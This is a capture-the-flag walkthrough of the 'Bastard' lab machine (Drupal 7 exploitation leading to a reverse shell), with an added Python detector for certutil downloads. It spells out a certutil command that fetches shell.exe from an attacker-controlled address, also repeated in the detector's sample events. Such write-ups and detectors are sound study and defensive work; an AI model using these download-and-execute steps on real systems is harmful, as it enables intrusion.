🎯Bastard
I start with nmap:
On the webpage I don't find anything interesting, so I decide to register a user:
It looks like we can't register.
We then see that there is Drupal 7 running:
So, looking at the possible exploits:
We find this exploit:
That runs just fine:
So now we are going to create a directory and import our reverse shell in it:
The command uses `certutil`, a command-line utility that's part of Windows. `certutil` is typically used for managing certificates and certificate authority (CA) information. However, it can also be repurposed for downloading files.

- `certutil`: This is the main executable for the certificate utility.
- `-urlcache`: This option specifies that the command is to work with the URL cache. It allows `certutil` to interact with URLs and perform operations such as retrieving data from a web address.
- `-f`: This flag stands for "force" and is used to force the operation. It means `certutil` will overwrite the file if it already exists at the specified destination.
- `http://10.10.14.159:8080/shell.exe`: This is the URL from which `certutil` will download the file. In this case, it is an executable file named `shell.exe` hosted on a server with the IP address `10.10.14.159` and port `8080`.
- `c:\temp\shell.exe`: This is the local path where the downloaded file will be saved. The file will be stored as `shell.exe` in the `c:\temp` directory.

`certutil` is available by default on Windows systems, meaning the attacker does not need to install additional software, which could be detected.
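Seen from the defender's side, the download described above shows up in process-creation logs. The following is an added example, not part of the original writeup: it parses command lines for `certutil` URL-cache downloads and ranks them by parent process. The event shape, host names, parent process names and the `192.0.2.10` address are constructed assumptions; the first sample command is assembled from the parts listed above.

```python
import re

URL = re.compile(r'(?:https?|ftp)://\S+', re.I)
# Assumption: parent images typical of a web server worker; adjust to your estate.
WEB_PARENTS = {"w3wp.exe", "php-cgi.exe", "httpd.exe"}

def parse_certutil_download(cmdline):
    """Return url/dest/force for a certutil URL-cache download, else None."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if not tokens:
        return None
    image = re.split(r'[\\/]', tokens[0])[-1].lower()
    if image not in ("certutil", "certutil.exe"):
        return None
    args = tokens[1:]
    # certutil takes switches with '-' or '/', case-insensitively.
    switches = {a[1:].lower() for a in args if a[:1] in "-/"}
    positional = [a for a in args if a[:1] not in "-/"]
    urls = [a for a in positional if URL.match(a)]
    if "urlcache" not in switches or not urls:
        return None  # e.g. -hashfile, or cache listing/cleanup without a URL
    dest = next((a for a in positional if not URL.match(a)), None)
    return {"url": urls[0], "dest": dest, "force": "f" in switches}

def triage(events):
    """Return (host, severity, details) for every download found in the events."""
    hits = []
    for ev in events:
        hit = parse_certutil_download(ev["cmdline"])
        if hit:
            parent = ev.get("parent", "").lower()
            severity = "high" if parent in WEB_PARENTS else "medium"
            hits.append((ev["host"], severity, hit))
    return hits

# Constructed process-creation events (shape is hypothetical, not a real log schema).
SAMPLE_EVENTS = [
    {"host": "web01", "parent": "php-cgi.exe",
     "cmdline": r"certutil -urlcache -f http://10.10.14.159:8080/shell.exe c:\temp\shell.exe"},
    {"host": "ws07", "parent": "cmd.exe",
     "cmdline": r'"C:\Windows\System32\certutil.exe" /URLCache /F http://192.0.2.10/a.bin "C:\Users\Public\a b.bin"'},
    {"host": "ws07", "parent": "explorer.exe",
     "cmdline": r"certutil -hashfile C:\temp\setup.msi SHA256"},
    {"host": "ws09", "parent": "cmd.exe",
     "cmdline": "certutil -urlcache * delete"},
]

if __name__ == "__main__":
    for host, severity, hit in triage(SAMPLE_EVENTS):
        print(host, severity, hit)
```

Only the first two sample events are reported; the hash computation and the cache cleanup carry no URL and are ignored.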
Now we just need to trigger the reverse shell: